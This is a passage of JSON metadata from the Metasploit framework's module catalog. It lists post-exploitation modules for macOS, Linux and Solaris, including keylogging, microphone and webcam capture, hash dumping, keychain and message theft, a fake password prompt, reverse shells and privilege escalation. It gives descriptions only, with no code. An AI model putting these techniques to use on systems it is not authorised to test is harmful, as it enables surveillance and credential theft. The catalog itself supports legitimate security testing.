"is_install_path": true,
"ref_name": "multi/manage/dbvis_query",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/hsts_eraser": {
"name": "Web browsers HSTS entries eraser",
"full_name": "post/multi/manage/hsts_eraser",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sheila A. Berta (UnaPibaGeek)"
],
"description": "This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,\n Google Chrome, Opera, Safari and wget.",
"references": [
"URL-http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html",
"URL-https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-03 02:18:30 +0000",
"path": "/modules/post/multi/manage/hsts_eraser.rb",
"is_install_path": true,
"ref_name": "multi/manage/hsts_eraser",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/multi_post": {
"name": "Multi Manage Post Module Macro Execution",
"full_name": "post/multi/manage/multi_post",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"carlos_perez <carlos_perez@darkoperator.com>"
],
"description": "This module will execute a list of modules given in a macro file in the format\n of <module> <opt=val,opt=val> against the select session checking for compatibility\n of the module against the sessions and validation of the options provided.",
"references": [
],
"platform": "Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/multi_post.rb",
"is_install_path": true,
"ref_name": "multi/manage/multi_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/open": {
"name": "Open a file or URL on the target computer",
"full_name": "post/multi/manage/open",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Eliott Teissonniere"
],
"description": "This module will open any file or URL specified with the URI format on the\n target computer via the embedded commands such as 'open' or 'xdg-open'.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-21 16:46:15 +0000",
"path": "/modules/post/multi/manage/open.rb",
"is_install_path": true,
"ref_name": "multi/manage/open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/play_youtube": {
"name": "Multi Manage YouTube Broadcast",
"full_name": "post/multi/manage/play_youtube",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will broadcast a YouTube video on specified compromised systems. It will play\n the video in the target machine's native browser. The VID datastore option is the \"v\"\n parameter in a YouTube video's URL.\n\n Enabling the EMBED option will play the video in full screen mode through a clean interface\n but is not compatible with all videos.\n\n This module will create a custom profile for Firefox on Linux systems in the /tmp directory.",
"references": [
],
"platform": "Android,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-23 10:13:44 +0000",
"path": "/modules/post/multi/manage/play_youtube.rb",
"is_install_path": true,
"ref_name": "multi/manage/play_youtube",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk",
"audio-effects",
"screen-effects"
]
}
},
"post_multi/manage/record_mic": {
"name": "Multi Manage Record Microphone",
"full_name": "post/multi/manage/record_mic",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will enable and record your target's microphone.\n For non-Windows targets, please use Java meterpreter to be\n able to use this feature.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/record_mic.rb",
"is_install_path": true,
"ref_name": "multi/manage/record_mic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/screensaver": {
"name": "Multi Manage the screensaver of the target computer",
"full_name": "post/multi/manage/screensaver",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Eliott Teissonniere"
],
"description": "This module allows you to turn on or off the screensaver of the target computer and also\n lock the current session.",
"references": [
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-21 16:46:00 +0000",
"path": "/modules/post/multi/manage/screensaver.rb",
"is_install_path": true,
"ref_name": "multi/manage/screensaver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/set_wallpaper": {
"name": "Multi Manage Set Wallpaper",
"full_name": "post/multi/manage/set_wallpaper",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"timwr"
],
"description": "This module will set the desktop wallpaper background on the specified session.\n The method of setting the wallpaper depends on the platform type.",
"references": [
],
"platform": "Android,Linux,OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/set_wallpaper.rb",
"is_install_path": true,
"ref_name": "multi/manage/set_wallpaper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/shell_to_meterpreter": {
"name": "Shell to Meterpreter Upgrade",
"full_name": "post/multi/manage/shell_to_meterpreter",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module attempts to upgrade a command shell to meterpreter. The shell\n platform is automatically detected and the best version of meterpreter for\n the target is selected. Currently meterpreter/reverse_tcp is used on Windows\n and Linux, with 'python/meterpreter/reverse_tcp' used on all others.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-25 15:00:39 +0000",
"path": "/modules/post/multi/manage/shell_to_meterpreter.rb",
"is_install_path": true,
"ref_name": "multi/manage/shell_to_meterpreter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/sudo": {
"name": "Multiple Linux / Unix Post Sudo Upgrade Shell",
"full_name": "post/multi/manage/sudo",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"todb <todb@metasploit.com>",
"Ryan Baxendale <rbaxendale@gmail.com>"
],
"description": "This module attempts to upgrade a shell account to UID 0 by reusing the\n given password and passing it to sudo. This technique relies on sudo\n versions from 2008 and later which support -A.",
"references": [
"URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h"
],
"platform": "AIX,Linux,OSX,Solaris,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/sudo.rb",
"is_install_path": true,
"ref_name": "multi/manage/sudo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/system_session": {
"name": "Multi Manage System Remote TCP Shell Session",
"full_name": "post/multi/manage/system_session",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will create a Reverse TCP Shell on the target system\n using the system's own scripting environments installed on the\n target.",
"references": [
],
"platform": "Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-22 13:38:06 +0000",
"path": "/modules/post/multi/manage/system_session.rb",
"is_install_path": true,
"ref_name": "multi/manage/system_session",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/upload_exec": {
"name": "Upload and Execute",
"full_name": "post/multi/manage/upload_exec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Push a file and execute it.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 21:33:01 +0000",
"path": "/modules/post/multi/manage/upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/manage/upload_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/manage/zip": {
"name": "Multi Manage File Compressor",
"full_name": "post/multi/manage/zip",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module zips a file or a directory. On Linux, it uses the zip command.\n On Windows, it will try to use remote target's 7Zip if found. If not, it falls\n back to its Windows Scripting Host.",
"references": [
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/manage/zip.rb",
"is_install_path": true,
"ref_name": "multi/manage/zip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/recon/local_exploit_suggester": {
"name": "Multi Recon Local Exploit Suggester",
"full_name": "post/multi/recon/local_exploit_suggester",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"Mo"
],
"description": "This module suggests local meterpreter exploits that can be used.\n\n The exploits are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n\n It's important to note that not all local exploits will be fired.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.",
"references": [
],
"platform": "AIX,Android,Apple_iOS,BSD,BSDi,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-05 04:41:58 +0000",
"path": "/modules/post/multi/recon/local_exploit_suggester.rb",
"is_install_path": true,
"ref_name": "multi/recon/local_exploit_suggester",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/recon/multiport_egress_traffic": {
"name": "Generate TCP/UDP Outbound Traffic On Multiple Ports",
"full_name": "post/multi/recon/multiport_egress_traffic",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module generates TCP or UDP traffic across a\n sequence of ports, and is useful for finding firewall\n holes and egress filtering. It only generates traffic\n on the port range you specify. It is up to you to\n run a responder or packet capture tool on a remote\n endpoint to determine which ports are open.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/multi/recon/multiport_egress_traffic.rb",
"is_install_path": true,
"ref_name": "multi/recon/multiport_egress_traffic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_multi/recon/sudo_commands": {
"name": "Sudo Commands",
"full_name": "post/multi/recon/sudo_commands",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module examines the sudoers configuration for the session user\n and lists the commands executable via sudo.\n\n This module also inspects each command and reports potential avenues\n for privileged code execution due to poor file system permissions or\n permitting execution of executables known to be useful for privesc,\n such as utilities designed for file read/write, user modification,\n or execution of arbitrary operating system commands.\n\n Note, you may need to provide the password for the session user.",
"references": [
],
"platform": "BSD,Linux,OSX,Solaris,Unix",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/post/multi/recon/sudo_commands.rb",
"is_install_path": true,
"ref_name": "multi/recon/sudo_commands",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/admin/say": {
"name": "OS X Text to Speech Utility",
"full_name": "post/osx/admin/say",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will speak whatever is in the 'TEXT' option on the victim machine.",
"references": [
"URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/admin/say.rb",
"is_install_path": true,
"ref_name": "osx/admin/say",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/capture/keylog_recorder": {
"name": "OSX Capture Userspace Keylogger",
"full_name": "post/osx/capture/keylog_recorder",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Logs all keyboard events except cmd-keys and GUI password input.\n\n Keylogs are transferred between client/server in chunks\n every SYNCWAIT seconds for reliability.\n\n Works by calling the Carbon GetKeys() hook using the DL lib\n in OSX's system Ruby. The Ruby code is executed in a shell\n command using -e, so the payload never hits the disk.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"path": "/modules/post/osx/capture/keylog_recorder.rb",
"is_install_path": true,
"ref_name": "osx/capture/keylog_recorder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/capture/screen": {
"name": "OSX Screen Capture",
"full_name": "post/osx/capture/screen",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Peter Toth <globetother@gmail.com>"
],
"description": "This module takes screenshots of target desktop and automatically downloads them.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/capture/screen.rb",
"is_install_path": true,
"ref_name": "osx/capture/screen",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/apfs_encrypted_volume_passwd": {
"name": "Mac OS X APFS Encrypted Volume Password Disclosure",
"full_name": "post/osx/gather/apfs_encrypted_volume_passwd",
"rank": 300,
"disclosure_date": "2018-03-21",
"type": "post",
"author": [
"Sarah Edwards",
"cbrnrd"
],
"description": "This module exploits a flaw in OSX 10.13 through 10.13.3\n that discloses the passwords of encrypted APFS volumes.\n\n In OSX a normal user can use the 'log' command to view the system\n logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS\n volume the password is visible in plaintext within these logs.",
"references": [
"URL-https://thehackernews.com/2018/03/macos-apfs-password.html",
"URL-https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp"
],
"platform": "OSX",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-18 14:22:32 +0000",
"path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb",
"is_install_path": true,
"ref_name": "osx/gather/apfs_encrypted_volume_passwd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/autologin_password": {
"name": "OSX Gather Autologin Password as Root",
"full_name": "post/osx/gather/autologin_password",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.",
"references": [
"URL-http://www.brock-family.org/gavin/perl/kcpassword.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-22 22:25:39 +0000",
"path": "/modules/post/osx/gather/autologin_password.rb",
"is_install_path": true,
"ref_name": "osx/gather/autologin_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_adium": {
"name": "OS X Gather Adium Enumeration",
"full_name": "post/osx/gather/enum_adium",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. To loot both account\n plists and chat logs, simply set the action to 'ALL'.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_adium.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_adium",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_airport": {
"name": "OS X Gather Airport Wireless Preferences",
"full_name": "post/osx/gather/enum_airport",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_airport.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_airport",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_chicken_vnc_profile": {
"name": "OS X Gather Chicken of the VNC Profile",
"full_name": "post/osx/gather/enum_chicken_vnc_profile",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_chicken_vnc_profile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_colloquy": {
"name": "OS X Gather Colloquy Enumeration",
"full_name": "post/osx/gather/enum_colloquy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_colloquy.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_colloquy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_keychain": {
"name": "OS X Gather Keychain Enumeration",
"full_name": "post/osx/gather/enum_keychain",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"ipwnstuff <e@ipwnstuff.com>",
"joev <joev@metasploit.com>"
],
"description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/osx/gather/enum_keychain.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_keychain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_messages": {
"name": "OS X Gather Messages",
"full_name": "post/osx/gather/enum_messages",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Geckom <geckom@redteamr.com>"
],
"description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). Module\n was tested with OS X 10.11 (El Capitan).",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/gather/enum_messages.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_messages",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/enum_osx": {
"name": "OS X Gather Mac OS X System Information Enumeration",
"full_name": "post/osx/gather/enum_osx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"path": "/modules/post/osx/gather/enum_osx.rb",
"is_install_path": true,
"ref_name": "osx/gather/enum_osx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/hashdump": {
"name": "OS X Gather Mac OS X Password Hash Collector",
"full_name": "post/osx/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"hammackj <jacob.hammack@hammackj.com>",
"joev <joev@metasploit.com>"
],
"description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-15 21:01:05 +0000",
"path": "/modules/post/osx/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "osx/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/password_prompt_spoof": {
"name": "OSX Password Prompt Spoof",
"full_name": "post/osx/gather/password_prompt_spoof",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Joff Thyer <jsthyer@gmail.com>",
"joev <joev@metasploit.com>",
"Peter Toth <globetother@gmail.com>"
],
"description": "Presents a password prompt dialog to a logged-in OSX user.",
"references": [
"URL-http://blog.packetheader.net/2011/10/fun-with-applescript.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-24 05:06:20 +0000",
"path": "/modules/post/osx/gather/password_prompt_spoof.rb",
"is_install_path": true,
"ref_name": "osx/gather/password_prompt_spoof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/safari_lastsession": {
"name": "OSX Gather Safari LastSession.plist",
"full_name": "post/osx/gather/safari_lastsession",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module downloads the LastSession.plist file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.",
"references": [
"URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/osx/gather/safari_lastsession.rb",
"is_install_path": true,
"ref_name": "osx/gather/safari_lastsession",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/gather/vnc_password_osx": {
"name": "OS X Display Apple VNC Password",
"full_name": "post/osx/gather/vnc_password_osx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kevin Gonzalvo <interhack@gmail.com>"
],
"description": "This module shows Apple VNC Password from Mac OS X High Sierra.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-02 14:22:09 +0000",
"path": "/modules/post/osx/gather/vnc_password_osx.rb",
"is_install_path": true,
"ref_name": "osx/gather/vnc_password_osx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/mount_share": {
"name": "OSX Network Share Mounter",
"full_name": "post/osx/manage/mount_share",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Peter Toth <globetother@gmail.com>",
"joev <joev@metasploit.com>"
],
"description": "This module lists saved network shares and tries to connect to them using stored\n credentials. This does not require root privileges.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/mount_share.rb",
"is_install_path": true,
"ref_name": "osx/manage/mount_share",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/record_mic": {
"name": "OSX Manage Record Microphone",
"full_name": "post/osx/manage/record_mic",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will allow the user to detect (with the LIST action) and\n capture (with the RECORD action) audio inputs on a remote OSX machine.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/record_mic.rb",
"is_install_path": true,
"ref_name": "osx/manage/record_mic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/vpn": {
"name": "OSX VPN Manager",
"full_name": "post/osx/manage/vpn",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Peter Toth <globetother@gmail.com>"
],
"description": "This module lists VPN connections and tries to connect to them using stored credentials.",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/vpn.rb",
"is_install_path": true,
"ref_name": "osx/manage/vpn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_osx/manage/webcam": {
"name": "OSX Manage Webcam",
"full_name": "post/osx/manage/webcam",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module will allow the user to detect installed webcams (with\n the LIST action), take a snapshot (with the SNAPSHOT action), or\n record a webcam and mic (with the RECORD action)",
"references": [
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/osx/manage/webcam.rb",
"is_install_path": true,
"ref_name": "osx/manage/webcam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/escalate/pfexec": {
"name": "Solaris pfexec Upgrade Shell",
"full_name": "post/solaris/escalate/pfexec",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to upgrade a shell session to UID 0 using pfexec.",
"references": [
"URL-https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html",
"URL-http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html",
"URL-http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec"
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-02-01 22:58:21 +0000",
"path": "/modules/post/solaris/escalate/pfexec.rb",
"is_install_path": true,
"ref_name": "solaris/escalate/pfexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/escalate/srsexec_readline": {
"name": "Solaris srsexec Arbitrary File Reader",
"full_name": "post/solaris/escalate/srsexec_readline",
"rank": 300,
"disclosure_date": "2007-05-07",
"type": "post",
"author": [
"h00die",
"iDefense"
],
"description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read because the suid bit is set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.",
"references": [
"CVE-2007-2617",
"URL-https://download.oracle.com/sunalerts/1000443.1.html",
